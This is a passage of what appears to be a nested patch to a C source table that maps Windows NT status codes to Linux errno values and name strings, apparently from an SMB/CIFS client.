+-	"STATUS_TOO_MANY_LUIDS_REQUESTED"},
+-	{STATUS_LUIDS_EXHAUSTED, -EIO, "STATUS_LUIDS_EXHAUSTED"},
+-	{STATUS_INVALID_SUB_AUTHORITY, -EIO, "STATUS_INVALID_SUB_AUTHORITY"},
+-	{STATUS_INVALID_ACL, -EIO, "STATUS_INVALID_ACL"},
+-	{STATUS_INVALID_SID, -EIO, "STATUS_INVALID_SID"},
+-	{STATUS_INVALID_SECURITY_DESCR, -EIO, "STATUS_INVALID_SECURITY_DESCR"},
+-	{STATUS_PROCEDURE_NOT_FOUND, -EIO, "STATUS_PROCEDURE_NOT_FOUND"},
+-	{STATUS_INVALID_IMAGE_FORMAT, -EIO, "STATUS_INVALID_IMAGE_FORMAT"},
+-	{STATUS_NO_TOKEN, -EIO, "STATUS_NO_TOKEN"},
+-	{STATUS_BAD_INHERITANCE_ACL, -EIO, "STATUS_BAD_INHERITANCE_ACL"},
+-	{STATUS_RANGE_NOT_LOCKED, -EIO, "STATUS_RANGE_NOT_LOCKED"},
+-	{STATUS_DISK_FULL, -ENOSPC, "STATUS_DISK_FULL"},
+-	{STATUS_SERVER_DISABLED, -EIO, "STATUS_SERVER_DISABLED"},
+-	{STATUS_SERVER_NOT_DISABLED, -EIO, "STATUS_SERVER_NOT_DISABLED"},
+-	{STATUS_TOO_MANY_GUIDS_REQUESTED, -EIO,
+-	"STATUS_TOO_MANY_GUIDS_REQUESTED"},
+-	{STATUS_GUIDS_EXHAUSTED, -EIO, "STATUS_GUIDS_EXHAUSTED"},
+-	{STATUS_INVALID_ID_AUTHORITY, -EIO, "STATUS_INVALID_ID_AUTHORITY"},
+-	{STATUS_AGENTS_EXHAUSTED, -EIO, "STATUS_AGENTS_EXHAUSTED"},
+-	{STATUS_INVALID_VOLUME_LABEL, -EIO, "STATUS_INVALID_VOLUME_LABEL"},
+-	{STATUS_SECTION_NOT_EXTENDED, -EIO, "STATUS_SECTION_NOT_EXTENDED"},
+-	{STATUS_NOT_MAPPED_DATA, -EIO, "STATUS_NOT_MAPPED_DATA"},
+-	{STATUS_RESOURCE_DATA_NOT_FOUND, -EIO,
+-	"STATUS_RESOURCE_DATA_NOT_FOUND"},
+-	{STATUS_RESOURCE_TYPE_NOT_FOUND, -EIO,
+-	"STATUS_RESOURCE_TYPE_NOT_FOUND"},
+-	{STATUS_RESOURCE_NAME_NOT_FOUND, -EIO,
+-	"STATUS_RESOURCE_NAME_NOT_FOUND"},
+-	{STATUS_ARRAY_BOUNDS_EXCEEDED, -EIO, "STATUS_ARRAY_BOUNDS_EXCEEDED"},
+-	{STATUS_FLOAT_DENORMAL_OPERAND, -EIO, "STATUS_FLOAT_DENORMAL_OPERAND"},
+-	{STATUS_FLOAT_DIVIDE_BY_ZERO, -EIO, "STATUS_FLOAT_DIVIDE_BY_ZERO"},
+-	{STATUS_FLOAT_INEXACT_RESULT, -EIO, "STATUS_FLOAT_INEXACT_RESULT"},
+-	{STATUS_FLOAT_INVALID_OPERATION, -EIO,
+-	"STATUS_FLOAT_INVALID_OPERATION"},
+-	{STATUS_FLOAT_OVERFLOW, -EIO, "STATUS_FLOAT_OVERFLOW"},
+-	{STATUS_FLOAT_STACK_CHECK, -EIO, "STATUS_FLOAT_STACK_CHECK"},
+-	{STATUS_FLOAT_UNDERFLOW, -EIO, "STATUS_FLOAT_UNDERFLOW"},
+-	{STATUS_INTEGER_DIVIDE_BY_ZERO, -EIO, "STATUS_INTEGER_DIVIDE_BY_ZERO"},
+-	{STATUS_INTEGER_OVERFLOW, -EIO, "STATUS_INTEGER_OVERFLOW"},
+-	{STATUS_PRIVILEGED_INSTRUCTION, -EIO, "STATUS_PRIVILEGED_INSTRUCTION"},
+-	{STATUS_TOO_MANY_PAGING_FILES, -EIO, "STATUS_TOO_MANY_PAGING_FILES"},
+-	{STATUS_FILE_INVALID, -EIO, "STATUS_FILE_INVALID"},
+-	{STATUS_ALLOTTED_SPACE_EXCEEDED, -EIO,
+-	"STATUS_ALLOTTED_SPACE_EXCEEDED"},
+-	{STATUS_INSUFFICIENT_RESOURCES, -EAGAIN,
+-				"STATUS_INSUFFICIENT_RESOURCES"},
+-	{STATUS_DFS_EXIT_PATH_FOUND, -EIO, "STATUS_DFS_EXIT_PATH_FOUND"},
+-	{STATUS_DEVICE_DATA_ERROR, -EIO, "STATUS_DEVICE_DATA_ERROR"},
+-	{STATUS_DEVICE_NOT_CONNECTED, -EIO, "STATUS_DEVICE_NOT_CONNECTED"},
+-	{STATUS_DEVICE_POWER_FAILURE, -EIO, "STATUS_DEVICE_POWER_FAILURE"},
+-	{STATUS_FREE_VM_NOT_AT_BASE, -EIO, "STATUS_FREE_VM_NOT_AT_BASE"},
+-	{STATUS_MEMORY_NOT_ALLOCATED, -EFAULT, "STATUS_MEMORY_NOT_ALLOCATED"},
+-	{STATUS_WORKING_SET_QUOTA, -EIO, "STATUS_WORKING_SET_QUOTA"},
+-	{STATUS_MEDIA_WRITE_PROTECTED, -EROFS, "STATUS_MEDIA_WRITE_PROTECTED"},
+-	{STATUS_DEVICE_NOT_READY, -EIO, "STATUS_DEVICE_NOT_READY"},
+-	{STATUS_INVALID_GROUP_ATTRIBUTES, -EIO,
+-	"STATUS_INVALID_GROUP_ATTRIBUTES"},
+-	{STATUS_BAD_IMPERSONATION_LEVEL, -EIO,
+-	"STATUS_BAD_IMPERSONATION_LEVEL"},
+-	{STATUS_CANT_OPEN_ANONYMOUS, -EIO, "STATUS_CANT_OPEN_ANONYMOUS"},
+-	{STATUS_BAD_VALIDATION_CLASS, -EIO, "STATUS_BAD_VALIDATION_CLASS"},
+-	{STATUS_BAD_TOKEN_TYPE, -EIO, "STATUS_BAD_TOKEN_TYPE"},
+-	{STATUS_BAD_MASTER_BOOT_RECORD, -EIO, "STATUS_BAD_MASTER_BOOT_RECORD"},
+-	{STATUS_INSTRUCTION_MISALIGNMENT, -EIO,
+-	"STATUS_INSTRUCTION_MISALIGNMENT"},
+-	{STATUS_INSTANCE_NOT_AVAILABLE, -EIO, "STATUS_INSTANCE_NOT_AVAILABLE"},
+-	{STATUS_PIPE_NOT_AVAILABLE, -EIO, "STATUS_PIPE_NOT_AVAILABLE"},
+-	{STATUS_INVALID_PIPE_STATE, -EIO, "STATUS_INVALID_PIPE_STATE"},
+-	{STATUS_PIPE_BUSY, -EBUSY, "STATUS_PIPE_BUSY"},
+-	{STATUS_ILLEGAL_FUNCTION, -EIO, "STATUS_ILLEGAL_FUNCTION"},
+-	{STATUS_PIPE_DISCONNECTED, -EPIPE, "STATUS_PIPE_DISCONNECTED"},
+-	{STATUS_PIPE_CLOSING, -EIO, "STATUS_PIPE_CLOSING"},
+-	{STATUS_PIPE_CONNECTED, -EIO, "STATUS_PIPE_CONNECTED"},
+-	{STATUS_PIPE_LISTENING, -EIO, "STATUS_PIPE_LISTENING"},
+-	{STATUS_INVALID_READ_MODE, -EIO, "STATUS_INVALID_READ_MODE"},
+-	{STATUS_IO_TIMEOUT, -EAGAIN, "STATUS_IO_TIMEOUT"},
+-	{STATUS_FILE_FORCED_CLOSED, -EIO, "STATUS_FILE_FORCED_CLOSED"},
+-	{STATUS_PROFILING_NOT_STARTED, -EIO, "STATUS_PROFILING_NOT_STARTED"},
+-	{STATUS_PROFILING_NOT_STOPPED, -EIO, "STATUS_PROFILING_NOT_STOPPED"},
+-	{STATUS_COULD_NOT_INTERPRET, -EIO, "STATUS_COULD_NOT_INTERPRET"},
+-	{STATUS_FILE_IS_A_DIRECTORY, -EISDIR, "STATUS_FILE_IS_A_DIRECTORY"},
+-	{STATUS_NOT_SUPPORTED, -EOPNOTSUPP, "STATUS_NOT_SUPPORTED"},
+-	{STATUS_REMOTE_NOT_LISTENING, -EHOSTDOWN,
+-	"STATUS_REMOTE_NOT_LISTENING"},
+-	{STATUS_DUPLICATE_NAME, -ENOTUNIQ, "STATUS_DUPLICATE_NAME"},
+-	{STATUS_BAD_NETWORK_PATH, -EINVAL, "STATUS_BAD_NETWORK_PATH"},
+-	{STATUS_NETWORK_BUSY, -EBUSY, "STATUS_NETWORK_BUSY"},
+-	{STATUS_DEVICE_DOES_NOT_EXIST, -ENODEV, "STATUS_DEVICE_DOES_NOT_EXIST"},
+-	{STATUS_TOO_MANY_COMMANDS, -EIO, "STATUS_TOO_MANY_COMMANDS"},
+-	{STATUS_ADAPTER_HARDWARE_ERROR, -EIO, "STATUS_ADAPTER_HARDWARE_ERROR"},
+-	{STATUS_INVALID_NETWORK_RESPONSE, -EIO,
+-	"STATUS_INVALID_NETWORK_RESPONSE"},
+-	{STATUS_UNEXPECTED_NETWORK_ERROR, -EIO,
+-	"STATUS_UNEXPECTED_NETWORK_ERROR"},
+-	{STATUS_BAD_REMOTE_ADAPTER, -EIO, "STATUS_BAD_REMOTE_ADAPTER"},
+-	{STATUS_PRINT_QUEUE_FULL, -EIO, "STATUS_PRINT_QUEUE_FULL"},
+-	{STATUS_NO_SPOOL_SPACE, -EIO, "STATUS_NO_SPOOL_SPACE"},
+-	{STATUS_PRINT_CANCELLED, -EIO, "STATUS_PRINT_CANCELLED"},
+-	{STATUS_NETWORK_NAME_DELETED, -EREMCHG, "STATUS_NETWORK_NAME_DELETED"},
+-	{STATUS_NETWORK_ACCESS_DENIED, -EACCES, "STATUS_NETWORK_ACCESS_DENIED"},
+-	{STATUS_BAD_DEVICE_TYPE, -EIO, "STATUS_BAD_DEVICE_TYPE"},
+-	{STATUS_BAD_NETWORK_NAME, -ENOENT, "STATUS_BAD_NETWORK_NAME"},
+-	{STATUS_TOO_MANY_NAMES, -EIO, "STATUS_TOO_MANY_NAMES"},
+-	{STATUS_TOO_MANY_SESSIONS, -EIO, "STATUS_TOO_MANY_SESSIONS"},
+-	{STATUS_SHARING_PAUSED, -EIO, "STATUS_SHARING_PAUSED"},
+-	{STATUS_REQUEST_NOT_ACCEPTED, -EIO, "STATUS_REQUEST_NOT_ACCEPTED"},
+-	{STATUS_REDIRECTOR_PAUSED, -EIO, "STATUS_REDIRECTOR_PAUSED"},
+-	{STATUS_NET_WRITE_FAULT, -EIO, "STATUS_NET_WRITE_FAULT"},
+-	{STATUS_PROFILING_AT_LIMIT, -EIO, "STATUS_PROFILING_AT_LIMIT"},
+-	{STATUS_NOT_SAME_DEVICE, -EXDEV, "STATUS_NOT_SAME_DEVICE"},
+-	{STATUS_FILE_RENAMED, -EIO, "STATUS_FILE_RENAMED"},
+-	{STATUS_VIRTUAL_CIRCUIT_CLOSED, -EIO, "STATUS_VIRTUAL_CIRCUIT_CLOSED"},
+-	{STATUS_NO_SECURITY_ON_OBJECT, -EIO, "STATUS_NO_SECURITY_ON_OBJECT"},
+-	{STATUS_CANT_WAIT, -EIO, "STATUS_CANT_WAIT"},
+-	{STATUS_PIPE_EMPTY, -EIO, "STATUS_PIPE_EMPTY"},
+-	{STATUS_CANT_ACCESS_DOMAIN_INFO, -EIO,
+-	"STATUS_CANT_ACCESS_DOMAIN_INFO"},
+-	{STATUS_CANT_TERMINATE_SELF, -EIO, "STATUS_CANT_TERMINATE_SELF"},
+-	{STATUS_INVALID_SERVER_STATE, -EIO, "STATUS_INVALID_SERVER_STATE"},
+-	{STATUS_INVALID_DOMAIN_STATE, -EIO, "STATUS_INVALID_DOMAIN_STATE"},
+-	{STATUS_INVALID_DOMAIN_ROLE, -EIO, "STATUS_INVALID_DOMAIN_ROLE"},
+-	{STATUS_NO_SUCH_DOMAIN, -EIO, "STATUS_NO_SUCH_DOMAIN"},
+-	{STATUS_DOMAIN_EXISTS, -EIO, "STATUS_DOMAIN_EXISTS"},
+-	{STATUS_DOMAIN_LIMIT_EXCEEDED, -EIO, "STATUS_DOMAIN_LIMIT_EXCEEDED"},
+-	{STATUS_OPLOCK_NOT_GRANTED, -EIO, "STATUS_OPLOCK_NOT_GRANTED"},
+-	{STATUS_INVALID_OPLOCK_PROTOCOL, -EIO,
+-	"STATUS_INVALID_OPLOCK_PROTOCOL"},
+-	{STATUS_INTERNAL_DB_CORRUPTION, -EIO, "STATUS_INTERNAL_DB_CORRUPTION"},
+-	{STATUS_INTERNAL_ERROR, -EIO, "STATUS_INTERNAL_ERROR"},
+-	{STATUS_GENERIC_NOT_MAPPED, -EIO, "STATUS_GENERIC_NOT_MAPPED"},
+-	{STATUS_BAD_DESCRIPTOR_FORMAT, -EIO, "STATUS_BAD_DESCRIPTOR_FORMAT"},
+-	{STATUS_INVALID_USER_BUFFER, -EIO, "STATUS_INVALID_USER_BUFFER"},
+-	{STATUS_UNEXPECTED_IO_ERROR, -EIO, "STATUS_UNEXPECTED_IO_ERROR"},
+-	{STATUS_UNEXPECTED_MM_CREATE_ERR, -EIO,
+-	"STATUS_UNEXPECTED_MM_CREATE_ERR"},
+-	{STATUS_UNEXPECTED_MM_MAP_ERROR, -EIO,
+-	"STATUS_UNEXPECTED_MM_MAP_ERROR"},
+-	{STATUS_UNEXPECTED_MM_EXTEND_ERR, -EIO,
+-	"STATUS_UNEXPECTED_MM_EXTEND_ERR"},
+-	{STATUS_NOT_LOGON_PROCESS, -EIO, "STATUS_NOT_LOGON_PROCESS"},
+-	{STATUS_LOGON_SESSION_EXISTS, -EIO, "STATUS_LOGON_SESSION_EXISTS"},
+-	{STATUS_INVALID_PARAMETER_1, -EINVAL, "STATUS_INVALID_PARAMETER_1"},
+-	{STATUS_INVALID_PARAMETER_2, -EINVAL, "STATUS_INVALID_PARAMETER_2"},
+-	{STATUS_INVALID_PARAMETER_3, -EINVAL, "STATUS_INVALID_PARAMETER_3"},
+-	{STATUS_INVALID_PARAMETER_4, -EINVAL, "STATUS_INVALID_PARAMETER_4"},
+-	{STATUS_INVALID_PARAMETER_5, -EINVAL, "STATUS_INVALID_PARAMETER_5"},
+-	{STATUS_INVALID_PARAMETER_6, -EINVAL, "STATUS_INVALID_PARAMETER_6"},
+-	{STATUS_INVALID_PARAMETER_7, -EINVAL, "STATUS_INVALID_PARAMETER_7"},
+-	{STATUS_INVALID_PARAMETER_8, -EINVAL, "STATUS_INVALID_PARAMETER_8"},
+-	{STATUS_INVALID_PARAMETER_9, -EINVAL, "STATUS_INVALID_PARAMETER_9"},
+-	{STATUS_INVALID_PARAMETER_10, -EINVAL, "STATUS_INVALID_PARAMETER_10"},
+-	{STATUS_INVALID_PARAMETER_11, -EINVAL, "STATUS_INVALID_PARAMETER_11"},
+-	{STATUS_INVALID_PARAMETER_12, -EINVAL, "STATUS_INVALID_PARAMETER_12"},
+-	{STATUS_REDIRECTOR_NOT_STARTED, -EIO, "STATUS_REDIRECTOR_NOT_STARTED"},
+-	{STATUS_REDIRECTOR_STARTED, -EIO, "STATUS_REDIRECTOR_STARTED"},
+-	{STATUS_STACK_OVERFLOW, -EIO, "STATUS_STACK_OVERFLOW"},
+-	{STATUS_NO_SUCH_PACKAGE, -EIO, "STATUS_NO_SUCH_PACKAGE"},
+-	{STATUS_BAD_FUNCTION_TABLE, -EIO, "STATUS_BAD_FUNCTION_TABLE"},
+-	{STATUS_VARIABLE_NOT_FOUND, -EIO, "STATUS_VARIABLE_NOT_FOUND"},
+-	{STATUS_DIRECTORY_NOT_EMPTY, -ENOTEMPTY, "STATUS_DIRECTORY_NOT_EMPTY"},
+-	{STATUS_FILE_CORRUPT_ERROR, -EIO, "STATUS_FILE_CORRUPT_ERROR"},
+-	{STATUS_NOT_A_DIRECTORY, -ENOTDIR, "STATUS_NOT_A_DIRECTORY"},
+-	{STATUS_BAD_LOGON_SESSION_STATE, -EIO,
+-	"STATUS_BAD_LOGON_SESSION_STATE"},
+-	{STATUS_LOGON_SESSION_COLLISION, -EIO,
+-	"STATUS_LOGON_SESSION_COLLISION"},
+-	{STATUS_NAME_TOO_LONG, -ENAMETOOLONG, "STATUS_NAME_TOO_LONG"},
+-	{STATUS_FILES_OPEN, -EIO, "STATUS_FILES_OPEN"},
+-	{STATUS_CONNECTION_IN_USE, -EIO, "STATUS_CONNECTION_IN_USE"},
+-	{STATUS_MESSAGE_NOT_FOUND, -EIO, "STATUS_MESSAGE_NOT_FOUND"},
+-	{STATUS_PROCESS_IS_TERMINATING, -EIO, "STATUS_PROCESS_IS_TERMINATING"},
+-	{STATUS_INVALID_LOGON_TYPE, -EIO, "STATUS_INVALID_LOGON_TYPE"},
+-	{STATUS_NO_GUID_TRANSLATION, -EIO, "STATUS_NO_GUID_TRANSLATION"},
+-	{STATUS_CANNOT_IMPERSONATE, -EIO, "STATUS_CANNOT_IMPERSONATE"},
+-	{STATUS_IMAGE_ALREADY_LOADED, -EIO, "STATUS_IMAGE_ALREADY_LOADED"},
+-	{STATUS_ABIOS_NOT_PRESENT, -EIO, "STATUS_ABIOS_NOT_PRESENT"},
+-	{STATUS_ABIOS_LID_NOT_EXIST, -EIO, "STATUS_ABIOS_LID_NOT_EXIST"},
+-	{STATUS_ABIOS_LID_ALREADY_OWNED, -EIO,
+-	"STATUS_ABIOS_LID_ALREADY_OWNED"},
+-	{STATUS_ABIOS_NOT_LID_OWNER, -EIO, "STATUS_ABIOS_NOT_LID_OWNER"},
+-	{STATUS_ABIOS_INVALID_COMMAND, -EIO, "STATUS_ABIOS_INVALID_COMMAND"},
+-	{STATUS_ABIOS_INVALID_LID, -EIO, "STATUS_ABIOS_INVALID_LID"},
+-	{STATUS_ABIOS_SELECTOR_NOT_AVAILABLE, -EIO,
+-	"STATUS_ABIOS_SELECTOR_NOT_AVAILABLE"},
+-	{STATUS_ABIOS_INVALID_SELECTOR, -EIO, "STATUS_ABIOS_INVALID_SELECTOR"},
+-	{STATUS_NO_LDT, -EIO, "STATUS_NO_LDT"},
+-	{STATUS_INVALID_LDT_SIZE, -EIO, "STATUS_INVALID_LDT_SIZE"},
+-	{STATUS_INVALID_LDT_OFFSET, -EIO, "STATUS_INVALID_LDT_OFFSET"},
+-	{STATUS_INVALID_LDT_DESCRIPTOR, -EIO, "STATUS_INVALID_LDT_DESCRIPTOR"},
+-	{STATUS_INVALID_IMAGE_NE_FORMAT, -EIO,
+-	"STATUS_INVALID_IMAGE_NE_FORMAT"},
+-	{STATUS_RXACT_INVALID_STATE, -EIO, "STATUS_RXACT_INVALID_STATE"},
+-	{STATUS_RXACT_COMMIT_FAILURE, -EIO, "STATUS_RXACT_COMMIT_FAILURE"},
+-	{STATUS_MAPPED_FILE_SIZE_ZERO, -EIO, "STATUS_MAPPED_FILE_SIZE_ZERO"},
+-	{STATUS_TOO_MANY_OPENED_FILES, -EMFILE, "STATUS_TOO_MANY_OPENED_FILES"},
+-	{STATUS_CANCELLED, -EIO, "STATUS_CANCELLED"},
+-	{STATUS_CANNOT_DELETE, -EACCES, "STATUS_CANNOT_DELETE"},
+-	{STATUS_INVALID_COMPUTER_NAME, -EIO, "STATUS_INVALID_COMPUTER_NAME"},
+-	{STATUS_FILE_DELETED, -EIO, "STATUS_FILE_DELETED"},
+-	{STATUS_SPECIAL_ACCOUNT, -EIO, "STATUS_SPECIAL_ACCOUNT"},
+-	{STATUS_SPECIAL_GROUP, -EIO, "STATUS_SPECIAL_GROUP"},
+-	{STATUS_SPECIAL_USER, -EIO, "STATUS_SPECIAL_USER"},
+-	{STATUS_MEMBERS_PRIMARY_GROUP, -EIO, "STATUS_MEMBERS_PRIMARY_GROUP"},
+-	{STATUS_FILE_CLOSED, -EBADF, "STATUS_FILE_CLOSED"},
+-	{STATUS_TOO_MANY_THREADS, -EIO, "STATUS_TOO_MANY_THREADS"},
+-	{STATUS_THREAD_NOT_IN_PROCESS, -EIO, "STATUS_THREAD_NOT_IN_PROCESS"},
+-	{STATUS_TOKEN_ALREADY_IN_USE, -EIO, "STATUS_TOKEN_ALREADY_IN_USE"},
+-	{STATUS_PAGEFILE_QUOTA_EXCEEDED, -EDQUOT,
+-	"STATUS_PAGEFILE_QUOTA_EXCEEDED"},
+-	{STATUS_COMMITMENT_LIMIT, -EIO, "STATUS_COMMITMENT_LIMIT"},
+-	{STATUS_INVALID_IMAGE_LE_FORMAT, -EIO,
+-	"STATUS_INVALID_IMAGE_LE_FORMAT"},
+-	{STATUS_INVALID_IMAGE_NOT_MZ, -EIO, "STATUS_INVALID_IMAGE_NOT_MZ"},
+-	{STATUS_INVALID_IMAGE_PROTECT, -EIO, "STATUS_INVALID_IMAGE_PROTECT"},
+-	{STATUS_INVALID_IMAGE_WIN_16, -EIO, "STATUS_INVALID_IMAGE_WIN_16"},
+-	{STATUS_LOGON_SERVER_CONFLICT, -EIO, "STATUS_LOGON_SERVER_CONFLICT"},
+-	{STATUS_TIME_DIFFERENCE_AT_DC, -EIO, "STATUS_TIME_DIFFERENCE_AT_DC"},
+-	{STATUS_SYNCHRONIZATION_REQUIRED, -EIO,
+-	"STATUS_SYNCHRONIZATION_REQUIRED"},
+-	{STATUS_DLL_NOT_FOUND, -ENOENT, "STATUS_DLL_NOT_FOUND"},
+-	{STATUS_OPEN_FAILED, -EIO, "STATUS_OPEN_FAILED"},
+-	{STATUS_IO_PRIVILEGE_FAILED, -EIO, "STATUS_IO_PRIVILEGE_FAILED"},
+-	{STATUS_ORDINAL_NOT_FOUND, -EIO, "STATUS_ORDINAL_NOT_FOUND"},
+-	{STATUS_ENTRYPOINT_NOT_FOUND, -EIO, "STATUS_ENTRYPOINT_NOT_FOUND"},
+-	{STATUS_CONTROL_C_EXIT, -EIO, "STATUS_CONTROL_C_EXIT"},
+-	{STATUS_LOCAL_DISCONNECT, -EIO, "STATUS_LOCAL_DISCONNECT"},
+-	{STATUS_REMOTE_DISCONNECT, -ESHUTDOWN, "STATUS_REMOTE_DISCONNECT"},
+-	{STATUS_REMOTE_RESOURCES, -EIO, "STATUS_REMOTE_RESOURCES"},
+-	{STATUS_LINK_FAILED, -EXDEV, "STATUS_LINK_FAILED"},
+-	{STATUS_LINK_TIMEOUT, -ETIMEDOUT, "STATUS_LINK_TIMEOUT"},
+-	{STATUS_INVALID_CONNECTION, -EIO, "STATUS_INVALID_CONNECTION"},
+-	{STATUS_INVALID_ADDRESS, -EIO, "STATUS_INVALID_ADDRESS"},
+-	{STATUS_DLL_INIT_FAILED, -EIO, "STATUS_DLL_INIT_FAILED"},
+-	{STATUS_MISSING_SYSTEMFILE, -EIO, "STATUS_MISSING_SYSTEMFILE"},
+-	{STATUS_UNHANDLED_EXCEPTION, -EIO, "STATUS_UNHANDLED_EXCEPTION"},
+-	{STATUS_APP_INIT_FAILURE, -EIO, "STATUS_APP_INIT_FAILURE"},
+-	{STATUS_PAGEFILE_CREATE_FAILED, -EIO, "STATUS_PAGEFILE_CREATE_FAILED"},
+-	{STATUS_NO_PAGEFILE, -EIO, "STATUS_NO_PAGEFILE"},
+-	{STATUS_INVALID_LEVEL, -EIO, "STATUS_INVALID_LEVEL"},
+-	{STATUS_WRONG_PASSWORD_CORE, -EIO, "STATUS_WRONG_PASSWORD_CORE"},
+-	{STATUS_ILLEGAL_FLOAT_CONTEXT, -EIO, "STATUS_ILLEGAL_FLOAT_CONTEXT"},
+-	{STATUS_PIPE_BROKEN, -EPIPE, "STATUS_PIPE_BROKEN"},
+-	{STATUS_REGISTRY_CORRUPT, -EIO, "STATUS_REGISTRY_CORRUPT"},
+-	{STATUS_REGISTRY_IO_FAILED, -EIO, "STATUS_REGISTRY_IO_FAILED"},
+-	{STATUS_NO_EVENT_PAIR, -EIO, "STATUS_NO_EVENT_PAIR"},
+-	{STATUS_UNRECOGNIZED_VOLUME, -EIO, "STATUS_UNRECOGNIZED_VOLUME"},
+-	{STATUS_SERIAL_NO_DEVICE_INITED, -EIO,
+-	"STATUS_SERIAL_NO_DEVICE_INITED"},
+-	{STATUS_NO_SUCH_ALIAS, -EIO, "STATUS_NO_SUCH_ALIAS"},
+-	{STATUS_MEMBER_NOT_IN_ALIAS, -EIO, "STATUS_MEMBER_NOT_IN_ALIAS"},
+-	{STATUS_MEMBER_IN_ALIAS, -EIO, "STATUS_MEMBER_IN_ALIAS"},
+-	{STATUS_ALIAS_EXISTS, -EIO, "STATUS_ALIAS_EXISTS"},
+-	{STATUS_LOGON_NOT_GRANTED, -EIO, "STATUS_LOGON_NOT_GRANTED"},
+-	{STATUS_TOO_MANY_SECRETS, -EIO, "STATUS_TOO_MANY_SECRETS"},
+-	{STATUS_SECRET_TOO_LONG, -EIO, "STATUS_SECRET_TOO_LONG"},
+-	{STATUS_INTERNAL_DB_ERROR, -EIO, "STATUS_INTERNAL_DB_ERROR"},
+-	{STATUS_FULLSCREEN_MODE, -EIO, "STATUS_FULLSCREEN_MODE"},
+-	{STATUS_TOO_MANY_CONTEXT_IDS, -EIO, "STATUS_TOO_MANY_CONTEXT_IDS"},
+-	{STATUS_LOGON_TYPE_NOT_GRANTED, -EIO, "STATUS_LOGON_TYPE_NOT_GRANTED"},
+-	{STATUS_NOT_REGISTRY_FILE, -EIO, "STATUS_NOT_REGISTRY_FILE"},
+-	{STATUS_NT_CROSS_ENCRYPTION_REQUIRED, -EIO,
+-	"STATUS_NT_CROSS_ENCRYPTION_REQUIRED"},
+-	{STATUS_DOMAIN_CTRLR_CONFIG_ERROR, -EIO,
+-	"STATUS_DOMAIN_CTRLR_CONFIG_ERROR"},
+-	{STATUS_FT_MISSING_MEMBER, -EIO, "STATUS_FT_MISSING_MEMBER"},
+-	{STATUS_ILL_FORMED_SERVICE_ENTRY, -EIO,
+-	"STATUS_ILL_FORMED_SERVICE_ENTRY"},
+-	{STATUS_ILLEGAL_CHARACTER, -EIO, "STATUS_ILLEGAL_CHARACTER"},
+-	{STATUS_UNMAPPABLE_CHARACTER, -EIO, "STATUS_UNMAPPABLE_CHARACTER"},
+-	{STATUS_UNDEFINED_CHARACTER, -EIO, "STATUS_UNDEFINED_CHARACTER"},
+-	{STATUS_FLOPPY_VOLUME, -EIO, "STATUS_FLOPPY_VOLUME"},
+-	{STATUS_FLOPPY_ID_MARK_NOT_FOUND, -EIO,
+-	"STATUS_FLOPPY_ID_MARK_NOT_FOUND"},
+-	{STATUS_FLOPPY_WRONG_CYLINDER, -EIO, "STATUS_FLOPPY_WRONG_CYLINDER"},
+-	{STATUS_FLOPPY_UNKNOWN_ERROR, -EIO, "STATUS_FLOPPY_UNKNOWN_ERROR"},
+-	{STATUS_FLOPPY_BAD_REGISTERS, -EIO, "STATUS_FLOPPY_BAD_REGISTERS"},
+-	{STATUS_DISK_RECALIBRATE_FAILED, -EIO,
+-	"STATUS_DISK_RECALIBRATE_FAILED"},
+-	{STATUS_DISK_OPERATION_FAILED, -EIO, "STATUS_DISK_OPERATION_FAILED"},
+-	{STATUS_DISK_RESET_FAILED, -EIO, "STATUS_DISK_RESET_FAILED"},
+-	{STATUS_SHARED_IRQ_BUSY, -EBUSY, "STATUS_SHARED_IRQ_BUSY"},
+-	{STATUS_FT_ORPHANING, -EIO, "STATUS_FT_ORPHANING"},
+-	{STATUS_BIOS_FAILED_TO_CONNECT_INTERRUPT, -EIO,
+-	"STATUS_BIOS_FAILED_TO_CONNECT_INTERRUPT"},
+-	{STATUS_PARTITION_FAILURE, -EIO, "STATUS_PARTITION_FAILURE"},
+-	{STATUS_INVALID_BLOCK_LENGTH, -EIO, "STATUS_INVALID_BLOCK_LENGTH"},
+-	{STATUS_DEVICE_NOT_PARTITIONED, -EIO, "STATUS_DEVICE_NOT_PARTITIONED"},
+-	{STATUS_UNABLE_TO_LOCK_MEDIA, -EIO, "STATUS_UNABLE_TO_LOCK_MEDIA"},
+-	{STATUS_UNABLE_TO_UNLOAD_MEDIA, -EIO, "STATUS_UNABLE_TO_UNLOAD_MEDIA"},
+-	{STATUS_EOM_OVERFLOW, -EIO, "STATUS_EOM_OVERFLOW"},
+-	{STATUS_NO_MEDIA, -EIO, "STATUS_NO_MEDIA"},
+-	{STATUS_NO_SUCH_MEMBER, -EIO, "STATUS_NO_SUCH_MEMBER"},
+-	{STATUS_INVALID_MEMBER, -EIO, "STATUS_INVALID_MEMBER"},
+-	{STATUS_KEY_DELETED, -EIO, "STATUS_KEY_DELETED"},
+-	{STATUS_NO_LOG_SPACE, -EIO, "STATUS_NO_LOG_SPACE"},
+-	{STATUS_TOO_MANY_SIDS, -EIO, "STATUS_TOO_MANY_SIDS"},
+-	{STATUS_LM_CROSS_ENCRYPTION_REQUIRED, -EIO,
+-	"STATUS_LM_CROSS_ENCRYPTION_REQUIRED"},
+-	{STATUS_KEY_HAS_CHILDREN, -EIO, "STATUS_KEY_HAS_CHILDREN"},
+-	{STATUS_CHILD_MUST_BE_VOLATILE, -EIO, "STATUS_CHILD_MUST_BE_VOLATILE"},
+-	{STATUS_DEVICE_CONFIGURATION_ERROR, -EIO,
+-	"STATUS_DEVICE_CONFIGURATION_ERROR"},
+-	{STATUS_DRIVER_INTERNAL_ERROR, -EIO, "STATUS_DRIVER_INTERNAL_ERROR"},
+-	{STATUS_INVALID_DEVICE_STATE, -EIO, "STATUS_INVALID_DEVICE_STATE"},
+-	{STATUS_IO_DEVICE_ERROR, -EIO, "STATUS_IO_DEVICE_ERROR"},
+-	{STATUS_DEVICE_PROTOCOL_ERROR, -EIO, "STATUS_DEVICE_PROTOCOL_ERROR"},
+-	{STATUS_BACKUP_CONTROLLER, -EIO, "STATUS_BACKUP_CONTROLLER"},
+-	{STATUS_LOG_FILE_FULL, -EIO, "STATUS_LOG_FILE_FULL"},
+-	{STATUS_TOO_LATE, -EIO, "STATUS_TOO_LATE"},
+-	{STATUS_NO_TRUST_LSA_SECRET, -EIO, "STATUS_NO_TRUST_LSA_SECRET"},
+-	{STATUS_NO_TRUST_SAM_ACCOUNT, -EIO, "STATUS_NO_TRUST_SAM_ACCOUNT"},
+-	{STATUS_TRUSTED_DOMAIN_FAILURE, -EIO, "STATUS_TRUSTED_DOMAIN_FAILURE"},
